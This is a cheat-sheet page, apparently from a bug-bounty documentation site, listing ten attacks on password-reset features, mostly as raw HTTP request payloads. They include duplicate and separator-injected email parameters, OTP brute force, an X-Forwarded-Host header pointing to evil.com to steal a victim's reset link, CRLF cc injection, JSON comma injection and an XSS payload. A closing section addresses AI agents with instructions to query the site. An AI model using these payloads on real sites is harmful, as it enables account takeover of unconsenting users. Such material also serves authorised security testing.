# ForgotPasswordFunctionality

### Forgot Password Functionality

### Introduction

Some common bugs in the forgot password / reset password functionality

### How to exploit

1. Parameter pollution

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&email=hacker@mail.com
```

2. Bruteforce the OTP code

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&code=$123456$
```

3. Host header Injection

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com
```

to

```
POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
...

email=victim@mail.com
```

And the victim will receive the reset link with evil.com

4. Using separator in value of the parameter

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com,hacker@mail.com
```

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%20hacker@mail.com
```

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com|hacker@mail.com
```

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%00hacker@mail.com
```

5. No domain in value of the paramter

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim
```

6. No TLD in value of the parameter

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail
```

7. Using carbon copy

```
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%0a%0dcc:hacker@mail.com
```

8. If there is JSON data in body requests, add comma

```
POST /newaccount HTTP/1.1
Host: target.com
...

{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
```

9. Find out how the tokens generate

* Generated based on TimeStamp
* Generated based on the ID of the user
* Generated based on the email of the user
* Generated based on the name of the user

10. Try Cross-Site Scripting (XSS) in the form

Sometimes the email is reflected in the forgot password page, try to use XSS payload

```
"<svg/onload=alert(1)>"@gmail.com
```

### References

* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://recondock.gitbook.io/recondock/forgotpasswordfunctionality.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.